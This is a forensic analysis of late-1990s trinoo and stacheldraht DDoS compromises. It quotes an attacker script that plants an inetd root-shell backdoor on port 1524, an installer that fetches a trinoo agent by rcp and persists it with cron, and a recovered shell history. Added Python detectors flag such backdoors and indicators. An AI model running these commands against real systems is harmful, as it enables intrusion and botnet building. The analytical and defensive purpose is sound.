In the directory were found tools for scanning entire Class B network blocks, several remote buffer overrun exploits, and denial of service programs. There were log files that are assumed to be lists of potential victim systems. Two such files (with their line counts, i.e. the number of hosts) are:

    41660 com.domains
    10549 216
    52209 total

The intruders were scanning the Internet for systems that have a known vulnerability, then compromising them using the following script, passing it the IP address of each "vulnerable" system:

    ./r -6 -k $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
     >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
    ./r -6 $1 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
     >>/tmp/bob; /usr/sbin/inetd -s /tmp/bob"
    echo Sleeping 2 seconds...
    sleep 2
    telnet $1 1524

The list of systems that were successfully penetrated (identified by filtering the output for signs of a successful "telnet" connection to the backdoor shell) was then used to generate another script. One such script was still in the cache, and contained a list of 100 such compromised systems, one line per host (fully qualified domain names were added at the end of each line for clarity).
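The line the compromise script above appends to /tmp/bob is an ordinary inetd entry whose server program is an interactive root shell, and ingreslock is TCP port 1524 in /etc/services, which is why the script then telnets to 1524. What follows is an added example, not part of the original analysis, of a host check for that: it parses inetd.conf-format lines for services whose server is a shell, and scans ps output for an inetd started with a configuration file other than the default. The sample config and ps lines are constructed, and the shell list and default path are assumptions.

```python
# Added example (not from the original analysis): flag inetd entries that serve
# a shell to whoever connects, like the 'ingreslock' line the attack script
# appends, and an inetd that was started with an explicit config file.
SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash", "/sbin/sh"}  # assumed list
DEFAULT_INETD_CONF = "/etc/inetd.conf"  # assumed default for this platform

# Constructed sample: one normal telnet entry plus the backdoor entry from the page.
SAMPLE_INETD_CONF = """\
# service socket proto wait/nowait user server args
telnet     stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
ingreslock stream tcp nowait root /bin/sh sh -i
"""

# Constructed 'ps' output; the second inetd was started the way the script does.
SAMPLE_PS = """\
  112 ?  0:00 /usr/sbin/inetd -s
 4431 ?  0:00 /usr/sbin/inetd -s /tmp/bob
"""

def parse_inetd_conf(text):
    """Yield one dict per service line; comments, blanks and short lines are skipped."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0].startswith("#"):
            continue
        yield {"service": f[0], "user": f[4], "server": f[5], "args": f[6:]}

def suspicious_services(text):
    """(service, reason) for entries whose server program is a shell."""
    hits = []
    for e in parse_inetd_conf(text):
        if e["server"] in SHELLS:
            reason = "shell as server"
            if e["user"] == "root":
                reason += ", runs as root"
            if "-i" in e["args"]:
                reason += ", interactive"
            hits.append((e["service"], reason))
    return hits

def inetd_config_args(ps_text):
    """Non-option arguments given to running inetd processes (an explicit
    config file path), excluding the default one."""
    found = []
    for line in ps_text.splitlines():
        _, sep, rest = line.partition("/inetd")
        if sep:
            found += [a for a in rest.split() if not a.startswith("-")]
    return [p for p in found if p != DEFAULT_INETD_CONF]
```

Run against the real /etc/inetd.conf and ps output, any hit from either function is worth a look; on the page's victims the backdoor survives only as long as the extra inetd process, so the ps check catches what the config check misses.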
The script "trin.sh" being piped to the backdoor port on each compromised system does the actual installation of a trinoo DDoS agent on each system:
    echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
    echo "echo rcp is done moving binary"
    echo "chmod +x /usr/sbin/rpc.listen"
    echo "echo launching trinoo"
    echo "/usr/sbin/rpc.listen"
    echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
    echo "crontab cron"
    echo "echo launched"
    echo "exit"

Found in December 1999 on a stacheldraht agent, identified with the "gag" scanner, was the following shell .history file (the semi-colon is required by some remote exploit shells):
    #+0946131241
    ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp && chmod 755 ./.tmp && ./.tmp && rm -f .tmp ;
    #+0946131241
    rm -rf /usr/lib/libx ;
    #+0946131241
    mkdir /usr/lib/libx ;
    #+0946131241
    mkdir /usr/lib/libx/... ;
    #+0946131241
    cd /usr/lib/libx/.../ ;
    #+0946131241
    rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ;
    #+0946131244
    nohup ./ttymon ;
    #+0946131244
    rm -rf ./ttymon ;

The numbers are Unix timestamps. Converting the first and last ones shows how long it took to root the system, set up a DDoS agent, and clean up:

    % ctime 0946131241
    Sat Dec 25 6:14:01 1999
    % ctime 0946131244
    Sat Dec 25 6:14:04 1999

Just over three seconds.
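To repeat the timing argument above on any recovered .history file, here is an added example that is not part of the original analysis: it pairs each command with the '#+' timestamp that precedes it, measures the span between the first and last command, renders a stamp the way ctime does (in UTC here, since the page's 6:14:01 is local Pacific time), and flags the command patterns that make up the fetch, hide, run and wipe sequence. The sample history is constructed from the one quoted above; the indicator patterns are an assumption.

```python
# Added example (not from the original analysis): timeline from a tcsh .history file,
# whose '#+NNNNNNNNNN' lines are the Unix timestamps the page converts with ctime.
import re
from datetime import datetime, timezone
# Constructed from the .history quoted on this page (hostname masked as there).
SAMPLE_HISTORY = """#+0946131241
ps -u root -e | grep ttymon | awk '{print "kill -9 "$1}' > .tmp && chmod 755 ./.tmp && ./.tmp && rm -f .tmp ;
#+0946131241
rm -rf /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx ;
#+0946131241
mkdir /usr/lib/libx/... ;
#+0946131241
cd /usr/lib/libx/.../ ;
#+0946131241
rcp root@XXXXX.XXXXXXXX.lu.se:td ttymon ;
#+0946131244
nohup ./ttymon ;
#+0946131244
rm -rf ./ttymon ;
"""
INDICATORS = {  # together these match the fetch / hide / run / wipe sequence above
    "remote_copy": re.compile(r"\b(rcp|scp)\b"),
    "hidden_dir": re.compile(r"/\.\.\.(/|\s|$)"),
    "background_exec": re.compile(r"\bnohup\b"),
    "cleanup": re.compile(r"\brm\s+-rf\b"),
}

def parse_history(text):
    """Return [(epoch, command)], pairing each command with the stamp before it."""
    entries, stamp = [], None
    for line in text.splitlines():
        m = re.match(r"^#\+(\d+)$", line)
        if m:
            stamp = int(m.group(1))
        elif line.strip():
            entries.append((stamp, line.strip()))
    return entries

def elapsed_seconds(entries):
    """Seconds between the earliest and latest timestamped command."""
    stamps = [ts for ts, _ in entries if ts is not None]
    return max(stamps) - min(stamps)

def flag_indicators(entries):
    return {n: [c for _, c in entries if p.search(c)] for n, p in INDICATORS.items()}
def utc_ctime(epoch):
    """The page's ctime step in UTC (946131241 -> 14:14:01; the page shows 6:14:01 Pacific)."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y")
```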
Assuming 3 to 6 seconds for each host, and pre-selection of the target systems, it would have taken somewhere around 2 - 4 hours to set up the network of 2,200 systems used against the University of Minnesota in August 1999. Reports from at least one site in the US, which recovered a syslog file showing rcp transfers, confirmed that thousands of systems can be set up in this manner in a matter of a few hours. (The preliminary scanning/sorting itself would presumably take days or weeks to accomplish, but would generate very little attention at most sites.)